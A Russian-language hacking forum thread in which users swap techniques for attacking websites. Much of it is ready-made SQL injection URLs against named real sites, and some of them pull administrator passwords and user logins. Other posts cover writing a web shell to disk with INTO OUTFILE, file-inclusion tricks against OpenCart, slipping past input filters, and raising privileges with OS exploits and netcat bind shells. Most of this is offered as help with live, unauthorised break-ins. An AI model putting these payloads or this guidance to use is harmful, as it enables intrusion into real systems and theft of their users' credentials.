Точный адрес в БД Jooml'ы не прописан, наксколько мне известно, но возможно возможно подскажет следующее:
1. Select email from jos_users where usertype='Super Administrator'
Смотрим мыло админа, довольно часто бывает что в названии админского мыла указывается источник на домен, например admin@искомый_домен.com. Если же нет, и там просто мыло типа mail.ru, то можно пройти сюда 2ip.ru/domain-list-by-email/, вести полученное мыло, и если повезет и поиск выдаст какие-то домены, найти те, сайты которых на Jooml'e. Возможно искомый домен окажется в этом списке.
2. Select title from jos_categories
Получаем заголовки страниц, хранящихся в БД. Далее идем в гугл и составляем поисковый запрос, что-то типа intitle:"Полученный title". Опять таки, если повезет, то в выдаче гугла можно найти сайт по искомому заголовку.
3. Просто посмотреть на сайты, находящиеся на этом ip, если их там не много, и не влом этим заниматься, то отсеять все, которые не на Jooml'e, ну а в оставшиеся попытаться войти, используя полученные данные из jos_users. Авось повезет.
Но, это все конечно не панацея и не дает 100% результат в поиске искомого домена. Так, информация к размышлению, скорее



ммм, сенкс, а в phpbb есть чёнибуть для наводки?

qaz said:
ммм, сенкс, а в phpbb есть чёнибуть для наводки?


В случае с phpbb все гораздо прозрачнее.


PHP:
SELECT config_value FROM phpbb_config WHERE c onfig_name='server_name'

Получаем домен, на котором расположен форум.


PHP:
SELECT config_value FROM phpbb_config WHERE c onfig_name='script_path'

Получаем конечную папку с форумом, доступную из веба.

При подстановке разных параметров в значения через POST, увидел такую ошибку


PHP:
INSERT INTO`ap_form_0` (`ip_address`,`date_creat ed`)VALUES('мой ip','2013-07-14 15:59:15');Query failed:Table'formy.ap_form_0 'doesn't exist

это ошибка возникает если подставить "-" в параметр, если кавычку то все работает без ошибок, как то можно что то с этим сделать, и как я понял он не может найти указанную таблицу, то есть если и можно, то придется подбирать имя таблицы и поля?

Voinmraka said:
то придется подбирать имя таблицы и поля?


Если эти значения, включая и ип передаются через POST, можно попробовать вручную вызвать ошибку, в которой будет выведена интересующая информация, конечно если там и ' не фильтруются.

какие бы я запросы не вводил в уязвимый параметр все равно все остается также как я написал выше, разве что время меняется...


PHP:
SELECT*FROM`ap_form_-1_review`WHERE id=''Query failed:Table'zodiacsi_ formy.ap_form_-1_review'doesn't exist

еще нашел вот это... есть параметр id= если туда ввести значение -1 то выйдет вот это

Voinmraka said:
какие бы я запросы не вводил в уязвимый параметр все равно все остается также как я написал выше, разве что время меняется...

PHP:
SELECT*FROM`ap_form_-1_review`WHERE id=''Query failed:Table'zodiacsi_ formy.ap_form_-1_review'doesn't exist

еще нашел вот это... есть параметр id= если туда ввести значение -1 то выйдет вот это


Хм, интересный случай... А если ввести так...


Code:
Сначала поищем количество полей в таблице

ap_form_1_review

id=1` order by 1 --

id=1` order by 100 --

id=1` union select 1,2,3,4,5 --

Ну или попробовать вариант с error-based


Code:
id=1` union select * from(select * from(select NAME_CONST((select version()), 14)d) as t join (select NAME_CONST((select version()), 14)e) b)a --

А вообще хотелось бы увидеть линк в ПМ, можно поэкспериментировать...

BigBear said:
Хм, интересный случай... А если ввести так...

Code:
Сначала поищем количество полей в таблице

ap_form_1_review

id=1` order by 1 --

id=1` order by 100 --

id=1` union select 1,2,3,4,5 --



Так же не будет работать, если правильную таблицу указать, например:


Code:
id=1_review` SQL -- 1

Voinmraka, у вас же инъекция в имени таблицы...

XAMEHA said:
Так же не будет работать, если правильную таблицу указать, например:

Code:
id=1_review` SQL -- 1

Voinmraka
, у вас же инъекция в имени таблицы...


SELECT * FROM `ap_form_-1_review`

Хм, точно, просмотрел что там ещё окончание таблицы дописывается.

Ну значит просто добавлять

id=1_review` order by 1 --

и по аналогии

Подскажите пожалуйста, как в MySQL выполнить запрос into outfile в такой конструкции:

script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+version()))))

Имею мускуль рута и не экранирующиеся кавычки, команда load_file() работает нормально, но как только я пытаюсь сделать следующий запрос:

script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+user+from+table+into+outfile+'C:\tmp\test .php')))) мускуль мне выдаёт ошибку:


Code:
...блаблабла MySQL server version for the right syntax to use near 'into outfile 'C:\tmp\test.php'))))and'

На сервере винда, и интерпретатор ASP, а база данных мускуль.... есть ли возможность записи в файл в подобном случае?

Грабитель said:
На сервере винда, и интерпретатор ASP, а база данных мускуль.... есть ли возможность записи в файл в подобном случае?


Нет смысла использовать extractvalue при записи(При чтении - да) в файл в error-based инъекциях, дейлайте как это обычно делается...

Грабитель said:
Подскажите пожалуйста, как в MySQL выполнить запрос into outfile в такой конструкции:
script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+version()))))
Имею мускуль рута и не экранирующиеся кавычки, команда load_file() работает нормально, но как только я пытаюсь сделать следующий запрос:
script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+user+from+table+into+outfile+'C:\tmp\test .php')))) мускуль мне выдаёт ошибку:

Code:
...блаблабла MySQL server version for the right syntax to use near 'into outfile 'C:\tmp\test.php'))))and'

На сервере винда, и интерпретатор ASP, а база данных мускуль.... есть ли возможность записи в файл в подобном случае?


Насколько я помню, при extractvalue не действует способ into outfile.

Попробуй так


Code:
or (select count(*) from (select 1 union select 2 union select 3)x group by concat((select 1 into outfile '/usr/home/www/test.php' lines terminated by ""),floor(rand(0)*2)))

Судя по всему с пробелами у тебя запара. Но, думаю, в "скобочный" вариант переделать сам сможешь.

Есть доступ к сайту через Phpmyadmin пользователь sa что там можно сделать? Injection в сам PHPMYADMIN можно затеять?

kcash said:
Есть доступ к сайту через Phpmyadmin пользователь sa что там можно сделать? Injection в сам PHPMYADMIN можно затеять?


Если есть права на запись, то можно залить минишелл.

kcash said:
Есть доступ к сайту через Phpmyadmin пользователь sa что там можно сделать? Injection в сам PHPMYADMIN можно затеять?


Тут зависит от версии Phpmyadmin. Узнаешь версию и идешь в гугл за поиском експлоита, в гугле так и пишешь:exploit phpmyadmin

внекоторых версиях встречается такая уязвимость как php-Injection

http://www.drive-direct.ru/?go=servis&catid=38

Руками крутить скули, к сожалению, уже разучился. Havij принимает это за Blind-inj, а потом не может вытащить не таблицы, ни колонки. Вопрос - действительно ли это блайнд-инжект и крутится ли он?

rogatiy said:
http://www.drive-direct.ru/?go=servis&catid=38
Руками крутить скули, к сожалению, уже разучился. Havij принимает это за Blind-inj, а потом не может вытащить не таблицы, ни колонки. Вопрос - действительно ли это блайнд-инжект и крутится ли он?


Инъекция тут точно есть, 7 колонок в запросе.

Есть WAF. Пока даже версию не смог получить. Но пытаюсь.

Ну в общем это 3-я ветка MySQL


Code:
http://www.drive-direct.ru/?go=servis&catid=38+and+if((left(version(),1)=3),1,0)=1-- TRUE

BigBear said:
Инъекция тут точно есть, 7 колонок в запросе.
Есть WAF. Пока даже версию не смог получить. Но пытаюсь.
Ну в общем это 3-я ветка MySQL

Code:
http://www.drive-direct.ru/?go=servis&catid=38+and+if((left(version(),1)=3),1,0)=1-- TRUE



Бд: MySQL 3

Название: 1gb_drivedir

Вобщем постоянно натыкаюсь на одно и то же.. что хавиж, что sqlmap.. находим time-based инъекцию. но потом нещадно губит надежды нежеланием даже на уровне раскрытия таблиц. Т.е. иммя базы сказала, и вроде должно пойти но, не может почему-то.. то что у всех так установлены права на sql юзеров не поверю

[16:34:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[16:34:43] [INFO] retrieved:

[16:34:46] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..

[16:35:01] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

[16:35:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[16:35:03] [CRITICAL] unable to retrieve the number of database users

это я юзерс хотел посмотреть.... собственно с этого всё начинается

При заходе на опредленную страничку, ничего не добавляя мне выкидывает "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/htdocs/search.php on line 14" Можно ли это как нибудь использовать?

Br@!ns said:
При заходе на опредленную страничку, ничего не добавляя мне выкидывает "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/htdocs/search.php on line 14" Можно ли это как нибудь использовать?



нет!

хорошо) а даст ли нам что нибудь, если при вводе в строку поиска ковычки, нам выдаст ошибку sql syntax:

"DB query error.

Details: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 3

Please try later."

Какие дальше стоит пути рассматривать? сразу искать что нибудь другое? или можно тут что либо попробовать?

Br@!ns said:
хорошо) а даст ли нам что нибудь, если при вводе в строку поиска ковычки, нам выдаст ошибку sql syntax:
"DB query error.
Details: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 3
Please try later."
Какие дальше стоит пути рассматривать? сразу искать что нибудь другое? или можно тут что либо попробовать?


ордер бай потом селект

если фильтры не режут

Что-то интересное:

senpolia.info/news/79'/

По той ссылке нет ничего.

Но кое что забавное есть в другом месте:

http://senpolia.info/catalog/1111111111111111111111111111f1111111111111/

http://senpolia.info/catalog/1111111111111111111111111111f1111111111111/sad

вылетают sql ошибки. Притом если поставить в запрос один из символов '(),=+ ошибки уже нет

"]
[AVT] said:
Что-то интересное:
senpolia.info/news/79'/


Как вариант.

http://rghost.net/private/47599560/44bd9895a518837d08d84f61699a57f1/image.png

http://www.yacht-master.ru/board/viewphoto.php?p=203

http://www.windsurf.ru/board/viewphoto.php?&p=4885

В обоих случаях морковка вытягивает блайндом имя базы и затухает - таблицы вытащить не удаётся. Крутится ли оно руками?

rogatiy said:
http://www.yacht-master.ru/board/viewphoto.php?p=203
http://www.windsurf.ru/board/viewphoto.php?&p=4885
В обоих случаях морковка вытягивает блайндом имя базы и затухает - таблицы вытащить не удаётся. Крутится ли оно руками?


Вполне крутабельны.

1-ый линк:


Code:
http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,@@version,3,4,5,6,7,8+--+

2-ой линк:


Code:
http://www.windsurf.ru/board/viewphoto.php?&p=-99999'+union+select+1,@@version,3,4,5,6,7,8+--+

Благодарю! Сработало.

Хотелось бы вытащить аккаунты администраторов, благо группа для них имеется отдельная.


Code:
http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,U_Status,3,4,5,6,7,8+from+w 3t_Users+--+

Как отфильтровать U_Username по U_Status='Administrator'?

Ответ:


Code:
http://yacht-master.ru/board/viewphoto.php?&p=-99999'+union+select+1,U_Password,3,4,5,6,7,8+from+ w3t_Users+where+U_Status='Administrator'+--+

rogatiy said:
Благодарю! Сработало.
Хотелось бы вытащить аккаунты администраторов, благо группа для них имеется отдельная.

Code:
http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,U_Status,3,4,5,6,7,8+from+w 3t_Users+--+

Как отфильтровать U_Username по U_Status='Administrator'?


используй where

http://carptackle.ru/plugins/shop/features.php?product=1573

MySQL >5, есть information_schema

Морковка видит blind-inj, не может вытащить user_login из msk_user. Помогите, пожалуйста, подобрать кол-во колонок

rogatiy said:
http://carptackle.ru/plugins/shop/features.php?product=1573
MySQL >5, есть information_schema
Морковка видит blind-inj, не может вытащить user_login из msk_user. Помогите, пожалуйста, подобрать кол-во колонок


39 же


Code:
http://carptackle.ru/plugins/shop/features.php?product=1573+and+1=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39--

смотри тайтл

Есть скуля, на сайте таблица размеров в 2 млн записей


SELECT COUNT(field) FROM table WHERE LENGTH(field)>4


Показывает 2млн записей

Пробую дампить через LIMIT 0,1, дохожу до 80(LIMIT 80,1) и все, дальше данные не выводяться, в чем может быть проблема?

1NtR0 said:
Есть скуля, на сайте таблица размеров в 2 млн записей
Показывает 2млн записей
Пробую дампить через LIMIT 0,1, дохожу до 80(LIMIT 80,1) и все, дальше данные не выводяться, в чем может быть проблема?


Встречал пару раз такие случаи, попробуй вместо limit использовать where или having.

Для having обязательное условие наличие колонки в group by

Наткнулся на roundcube при вставки логина пишет вот что:

IMAP Error in /usr/local/www/apache22/data/roundcube/program/include/rcube_imap.php (205): Login failed for 'or''=' from 177.167.126.19. LOGIN: Login failed.

можно что то сделать?

Помогите новичку:

1.На сайте есть скуля,раскрутил но в БД нету логина админа,где он может храниться?

2.Так же есть логин и пароль юзера(root@localhost) бд, но не знаю как подключиться(При переходе на site.com/PMA/ пришет 403 Forbidden(( и ниче сделать не могу ) .

3.У юзера бд File_Priv=Y,читать файлы могу, но некак не могу залить шелл,везде пишет Can't create/write to file '....' (Errcode: 13)

Также на сайте имееться файл phpinfo.php . Может он что-то подскажет...

nicols said:
Помогите новичку:
1.На сайте есть скуля,раскрутил но в БД нету логина админа,где он может храниться?
2.Так же есть логин и пароль юзера(root@localhost) бд, но не знаю как подключиться(При переходе на site.com/PMA/ пришет 403 Forbidden(( и ниче сделать не могу ) .
3.У юзера бд File_Priv=Y,читать файлы могу, но некак не могу залить шелл,везде пишет Can't create/write to file '....' (Errcode: 13)
Также на сайте имееться файл phpinfo.php . Может он что-то подскажет...


Можешь попробовать удаленно подключиться к БД, можешь найти относительный путь соседних сайтов и прям со скули залиться в них, если пасса нет в БД, но есть админка, прочитай исходники админки и посмотри откуда он берет данные от пасса. с такой скуляй много чего придумать можно, все по ситуации.

Кто знает про вредоносную программу ZmEu - ищет уязвимости? Подскажите как работает?

Storm87 said:
Кто знает про вредоносную программу ZmEu - ищет уязвимости? Подскажите как работает?


никто не знает, тут гавнософтом не пользуются, только ручками

вот-эта чудо прога ломанула сервачок! надо мне её вычислить! для этого надо знать как она работает! верно?

Storm87 said:
вот-эта чудо прога ломанула сервачок! надо мне её вычислить! для этого надо знать как она работает! верно?



Смотри логи - все станет понятно

winstrool said:
Можешь попробовать удаленно подключиться к БД, можешь найти относительный путь соседних сайтов и прям со скули залиться в них, если пасса нет в БД, но есть админка, прочитай исходники админки и посмотри откуда он берет данные от пасса. с такой скуляй много чего придумать можно, все по ситуации.


В том то и дело,что я не могу подключиться к БД, но имею логин и пароль к БД. Может кто знает,как можно подключиться к БД удаленно.

И еще один вопрос:где в линуксе может храниться входы в админку сайта?

подключится к бд можно тем же шеллом всо залитым на любой хост там есть клиент

пассы на вход в админку могут быть где угодно в базе или в файле и от ос(линукс,вин)тут вообще не зависит

Shelling said:
подключится к бд можно тем же шеллом всо залитым на любой хост там есть клиент
пассы на вход в админку могут быть где угодно в базе или в файле и от ос(линукс,вин)тут вообще не зависит


Хорошо,а если вход в пхпмайадмин по этой ссылке site.com/PMA/ то что в host писать ( site.com/PMA/ или site.com/ ?


Shelling said:
пассы на вход в админку могут быть где угодно в базе или в файле и от ос(линукс,вин)тут вообще не зависит


А где в Линуксе они хроняться?

в хост писать имя сайта но не всегда мускул находиться на том же сервере на пример на мастрехосте это другой сервер по этому лучше прочитайте конфиг какойнибудь если найдёте

привет всем

есть SQL Inject, помогите раскрутить.


Code:
GET /junior/88/matches/stage/SQLInject/ HTTP/1.1
Referer: http://allhockey.ru:80/

На сайте фильтруются пробелы,все что пока получилось


Code:
/junior/88/matches/stage/'-1'UNION(SELECT(null),'test',3,4,(INTO(OUTFILE)'tes t.html))/

Подправьте, что не так или посоветуйте другие варианты

Каким образом можно создать площадку для проведения атаки на буфер обмена?

Нужна именно страница с таким кодом (на PHP), чтобы при запросе с определённым значением происходило переполнение буфера, вследствии чего появлялась ошибка (403, 228 etc.).

Проверка входящего запроса на наличие значение не пойдёт.

сайт.com/index.php?hl=ru&idd=cat&cat='

Добавив в конце кавычку выдало следующую ошибку:


Code:
Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT * FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id='' ORDER BY mbmproduct.name ASC LIMIT 0,9

Или всё-таки должно выдать You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near '1''

Unknowhacker said:
сайт.com/index.php?hl=ru&idd=cat&cat=
'
Добавив в конце кавычку выдало следующую ошибку:

Code:
Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT * FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id='' ORDER BY mbmproduct.name ASC LIMIT 0,9

Или всё-таки должно выдать
You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near '1''


Вывод ошибок зависит от реализации выборки данных с бд, или конфигурации php.

1,2) or 1=1 order by 10000 -- w - что выдаст ?

Inoms said:
Вывод ошибок зависит от реализации выборки данных с бд, или конфигурации php.
1,2) or 1=1 order by 10000 -- w - что выдаст ?


Ничего. Фильтрует


Code:
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13957%27

Unknowhacker said:
Ничего. Фильтрует

Code:
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13957%27



Это слепая sql.

Её бессмысленно крутить, только по-символьно вытаскивать данные -

http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=1%29%20or%201=1%20and%20substring%28%28version %28%29%29,1,1%29=5%20%23w

Если что-то равно чему-то, в данном случае, первый символ версии субд=5 - выведет каталог), если нет - пустоту.

Или при лучших обстоятельствах сделать вывод мини-шелла в диру с сайтом при соответствующих привилегиях и правах.

Unknowhacker said:
Ничего. Фильтрует

Code:
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13957%27



Так еще можно сделать

http://www.nova-plosha.com/index.php?idd=jobs&jobs=36'+and+1=0+union+select+1,2,3,(select(@x)fro m(select(@x:=0x00),(select(null)from(information_s chema.columns)where(table_schema!=0x696e666f726d61 74696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0 x3c62723e,table_schema,0x2e,table_name,0x3a,column _name))))x),5,6,7,8,9,10,11,12,13,14,15,16+--+

er9j6@ said:
Так еще можно сделать
http://www.nova-plosha.com/index.php?idd=jobs&jobs=36'+and+1=0+union+select+1,2,3,(select(@x)fro m(select(@x:=0x00),(select(null)from(information_s chema.columns)where(table_schema!=0x696e666f726d61 74696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0 x3c62723e,table_schema,0x2e,table_name,0x3a,column _name))))x),5,6,7,8,9,10,11,12,13,14,15,16+--+


Та я сморю бессмысленно это URL-запрос в код "отражает" и всё..

P.S Но чувствую что там есть "дырочка", квалификации знаний не хватает

Unknowhacker said:
Та я сморю бессмысленно это URL-запрос в код "отражает" и всё..
P.S Но чувствую что там есть "дырочка", квалификации знаний не хватает



Бессмысленности здесь нет!

er9j6@ привел способ вывода данных в формате


table_schema table_name column _name


через принтабельное поле.

p.s. уберите лишние пробелы

YaBtr said:
Бессмысленности здесь нет!
er9j6@
привел способ вывода данных в формате
через принтабельное поле.
p.s. уберите лишние пробелы


Ах, да извиняюсь честно слово, синтаксис не глянул. Пробелы убрал и действительно имена таблиц по выскакивали:

http://s10.postimg.org/lnifmfhxl/image.jpg

Убрав Восклицательный Знак в синтаксисе (table_schema!) я получил немного другой вид.. но правда это было не утешительно таблицы: dbrootgroupid; dblogin; dbpasswd; dbmail - исчезли

Что значит данная ошибка, или скорее как ее подправить, чтобы работало?


Code:
ERROR: UNION types integer and text cannot be matched LINE 1



Code:
UNION(SELECT(version()),version(),version(),versio n(),(version()))

Unknowhacker said:
Ах, да извиняюсь честно слово, синтаксис не глянул. Пробелы убрал и действительно имена таблиц по выскакивали:
Убрав Восклицательный Знак в синтаксисе (
table_schema
!) я получил немного другой вид.. но правда это было не утешительно таблицы: dbrootgroupid; dblogin; dbpasswd; dbmail - исчезли


Извлечь можно:


http://
www.nova-plosha.com
/index.php?idd=jobs&jobs=36'+and+1=0+union+select+1,2,3,(select(@x)fro m(select(@x:=0x00),(select(0)from(novaplosha.wbwus er)where(0x00)in(@x:=concat(@x,0x3c62723e,dblogin, 0x3a,dbpasswd))))x),5,6,7,8,9,10,11,12,13,14,15,16 +--+

YaBtr said:
Извлечь можно:


СпасибО!

Подвержен ли данный код LFI ?

В папке "../../download" лежит шелл, как его проинклудить через


PHP:
$route

?


PHP:
public function__construct($route,$args= array() ) {

$path='';



$parts=explode('/',str_replace('../','', (string)$route));



foreach ($partsas$part) {

$path.=$part;



if (is_dir(DIR_APPLICATIO N.'controller/'.$path)) {

$path.='/';



array_shift($parts);



continue;

}



if (is_file(DIR_APPLICATI ON.'controller/'.str_replace('../','',$path) .'.php')) {

$this->file=DIR_APPLICATION.'controller/'.str_replace('../','',$path) .'.php';



$this->class='Controller'.preg_replace('/[^a-zA-Z0-9]/','',$path);

array_shift($parts);



break;

}

}



if ($args) {

$this->args=$args;

}



$method=array_shift($parts);



if ($method) {

$this->method=$method;

} else {

$this->method='index';

}

}



public functiongetFile() {

return$this->file;

}



public functiongetClass() {

return$this->class;

}



public functiongetMethod() {

return$this->method;

}



public functiongetArgs() {

return$this->args;

}

}

TRX.new, Если можно использовать Windows-слэши, то используйте их, с UNIX-слэшами никак нельзя(Предполагается, что $this->file попадает в инклуд).

XAMEHA said:
TRX.new
, Если можно использовать Windows-слэши, то используйте их, с UNIX-слэшами никак нельзя(Предполагается, что
$this->file
попадает в инклуд).


Вот сюда в итоге попадает $file


PHP:
private functionexecute($action) {

$file=$action->getFile();

...

if (file_exists($file)) {

require_once($file);

Виндовые слеши не отрабатывают, т.к. все на Linux.

Тогда такой вопрос: есть два разных сервака. На одном OpenCart 1.5.3.1 на другом 1.5.2.1. Методами, описанными в статье waraxe, я залил файл на оба сервера в папку download , но на 1.5.3.1 shell выполняется , а на 1.5.2.1 нет. Причем стоит заметить что я заливаю файл test.php.jpg , на сервере имя формируется так test.php.jpg.{md5(mt_rand())}. Имя файла на сервере узнать легко, поэтому это не проблема. Задача на сервере с 1.5.2.1 выполнить shell , но там получаю файл как картинку.

Версия PHP на обоих серваках : 5.2.17

Также в корне сайта есть php.ini

1.5.3.1 :


Code:
magic_quotes_gpc = Off;
register_globals = off;
default_charset = UTF-8;
memory_limit = 64M;
max_execution_time = 18000;
upload_max_filesize = 999M;
safe_mode = Off;
mysql.connect_timeout = 20;
session.use_cookies = On;
session.use_trans_sid = Off;
session.gc_maxlifetime = 12000000;
allow_url_fopen = on;
display_errors = 1;
error_reporting = E_ALL;

1.5.2.1:


Code:
magic_quotes_gpc = Off;
magic_quotes_runtime = Off;
magic_quotes_sybase = Off;
register_globals = Off;
default_charset = UTF-8;
memory_limit = 64M;
max_execution_time = 18000;
upload_max_filesize = 999M;
safe_mode = Off;
mysql.connect_timeout = 20;
session.use_cookies = On;
session.use_trans_sid = Off;
session.gc_maxlifetime = 12000000;
allow_url_fopen = on;
date.timezone = Asia/Yekaterinburg;
;display_errors = 1;
;error_reporting = E_ALL;

Не думаю, что они положили отдельный файлик .htaccess в папку download.

Цель : выполнить shell на серве с 1.5.2.1

Тогда такой вопрос: есть два разных сервака. На одном OpenCart 1.5.3.1 на другом 1.5.2.1. Методами, описанными в статье waraxe, я залил файл на оба сервера в папку download , но на 1.5.3.1 shell выполняется , а на 1.5.2.1 нет.


Это уже вопрос по другому коду, вы уверены что он один и тот-же? Можно его, а так-же ссылку на эту статью?

По инклуду вердикт однозначный - с использованием UNIX-слэшей спуск невозможен. Набросал тут кое-что на эту тему: https://forum.antichat.net/thread390482.html

XAMEHA said:
Это уже вопрос по другому коду, вы уверены что он один и тот-же? Можно его, а так-же ссылку на эту статью?
По инклуду вердикт однозначный - с использованием UNIX-слэшей спуск невозможен. Набросал тут кое-что на эту тему: https://forum.antichat.net/thread390482.html


Спасибо большое. Статья вот: http://www.waraxe.us/advisory-84.html

Это для версии 1.5.2.1 , но применил и к 1.5.3.1 (и здесь то как раз работает, я получил рабочий шелл). В случае с 1.5.2.1 шелл грузится как изображение.

Дело обстоит так.. есть сайт, на котором можно узнать version; database запросом


Code:
and(extractvalue(1,concat(0x3a,database())))and'

, а для получения пароля нужно выполнить запрос (Источник кн. Дмитрий Евтеев Positive technologies стр. 24)


Code:
and(extractvalue(1,concat(0x3a,(select pass from users limit 0,1)))and'

задача заключается в том, чтобы обойти ПРОБЕЛЫ .. Знатоки, помогите!

Unknowhacker said:
Дело обстоит так.. есть сайт, на котором можно узнать version; database запросом

Code:
and(extractvalue(1,concat(0x3a,database())))and'

, а для получения пароля нужно выполнить запрос (Источник кн. Дмитрий Евтеев Positive technologies стр. 24)

Code:
and(extractvalue(1,concat(0x3a,(select pass from users limit 0,1)))and'

задача заключается в том, чтобы обойти ПРОБЕЛЫ .. Знатоки, помогите!


select(password)from(tables)where(id=1)

только грешно взломами....

Грабитель said:
select(password)from(tables)where(id=1)
только грешно взломами....


Переделал на


Code:
and(extractvalue(1,concat(0x3a,select(password)fro m(tables)where(id=1))))and'

... не хочет зараза дикая

LFI провожу на сервере, на котором Mac OS X

После двухдневного копания, отрыла логи error_log, не обновлялся с 2010 года, притом судя по последней записи "Defaced", этот лог тогда кто-то явно отравил

В связи с этим вопрос: можно ли на Mac OS x найти некое подобие proc/self/environ ? Где бы писался user-agent?

php://filter работает, но удалось посмотреть исходный код только main.php

Нашла логин, пароль, бд от MySQL sphinx, но дело дохлое: только local host connection

надо лить шелл...но как это сделать на этом *** Mac OS X

OxoTnik said:
Посмотри другие логи, пути тут http://wiki.apache.org/httpd/DistrosDefaultLayout


не, НЕТУ

мЕНЯ НАСТОРАЖИВАЕТ, что все конфиги updat'ы 2010 года. что это значит? Сайт живой, обновляется просто постоянно, постоянный доступ посетителей....

edit: хотя нет, /var/log/secure.log обновляется сегодняшним днем к примеру

Ничего настораживающего. Рабочие логи, как могут быть в другом месте, так и вовсе быть отключены в целях повышеня производительности. Можно попробовать поискать субдомены, обычно на технических, девелоп и тп сабах логи включены, не требуют тонкого тюнинга и тп.

Cennarios said:
Ничего настораживающего. Рабочие логи, как могут быть в другом месте, так и вовсе быть отключены в целях повышеня производительности. Можно попробовать поискать субдомены, обычно на технических, девелоп и тп сабах логи включены, не требуют тонкого тюнинга и тп.


хм, спасибо, попробую в суб-доменах поискать....

EDIT: в суб-доменах та же херь

Помогите раскрутить


Code:
http://www.hochuvotpusk.ru:80/info.php?id=41

Ребят, нашёл это: http://rp-gameworld.ru/misc/ что можно сделать с этим?

Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+

Кто осилит?

seozone said:
Ребят, нашёл это: http://rp-gameworld.ru/misc/ что можно сделать с этим?


да ты порутал этот серв ничего с этого не поимеешь бро

Ребята подскажите кто сталкивался, в инъекции не пропускает скобки id=-7888+union+select+1,2,3,database(),5,6,7,8,9,10,11 ,12,13,14,15,16,17--

как это можно обойти?

cipa21 said:
Ребята подскажите кто сталкивался, в инъекции не пропускает скобки id=-7888+union+select+1,2,3,database(),5,6,7,8,9,10,11 ,12,13,14,15,16,17--
как это можно обойти?



Попробуй следующие запросы:

id=-7888+union+select+1,2,3,table_name,5,6,7,8,9,10,11 ,12,13,14,15,16,17 from information_schema.tables limit n,1+--+

id=-7888+union+select+1,2,3,column_name,5,6,7,8,9,10,1 1,12,13,14,15,16,17 from information_schema.columns where table_name=[таблица] или 0x[hex таблицы] limit n,1+--+


Попробуй перебор стандартных пользовательских таблиц:

id=-7888+union+select+1,2,3,password,5,6,7,8,9,10,11,1 2,13,14,15,16,17 from [таблица пользователей]+--+

Также иногда помогает hex: 0x[user],0x[password]

cipa21 said:
Ребята подскажите кто сталкивался, в инъекции не пропускает скобки id=-7888+union+select+1,2,3,database(),5,6,7,8,9,10,11 ,12,13,14,15,16,17--
как это можно обойти?


id=-7888+union+select+1,2,3,@@version,5,6,7,8,9,10,11, 12,13,14,15,16,17--

пропускает ?

Привет . Есть вопрос про шелл . Вообшем залил шелл пробую закинуть какой нибудь пхп файл . пишет : ERROR cant c hmod 0777 . То есть надо как то присвоить права администратора или как обойти ето? spasibo

sfinxs said:
Привет . Есть вопрос про шелл . Вообшем залил шелл пробую закинуть какой нибудь пхп файл . пишет : ERROR cant c hmod 0777 . То есть надо как то присвоить права администратора или как обойти ето? spasibo


Команда chmod

+x - позволяет только запускать скрипт.

+rx - позволяет запускать и просматривать содержимое.

Также посмотрите и почитайте числовую установку прав доступа.

спс. а где ето ? на счет прав доступа неполучаеться поменять . пишет : админ - все доступы . ГРОУП - read only . другие : вообше нет. надо BIND делать и с netcat подключаться или по другому можно? )

sfinxs said:
спс. а где ето ? на счет прав доступа неполучаеться поменять . пишет : админ - все доступы . ГРОУП - read only . другие : вообше нет. надо BIND делать и с netcat подключаться или по другому можно? )


Попробуйте повысить права:

Версия операционной системы --> exploit

самописный у него движок . ненаходит сканнер . Индекс.хтмл файла нету вообше. только индех.пх . где мануал какой нить ?

sfinxs said:
самописный у него движок . ненаходит сканнер .


движок тут вобще не причём, под словами ,,Версия операционной системы --> exploit,, имеется в виду порутать серв


sfinxs said:
Индекс.хтмл файла нету вообше.


ну понятное дело, все на пхп написано


sfinxs said:
где мануал какой нить ?


мануал по чём?

о том как повысить права или експлоит ОС где скачать и как юзать . Но может просто способ есть как присвоить себе права ? kak

Доброго времени суток, господа!

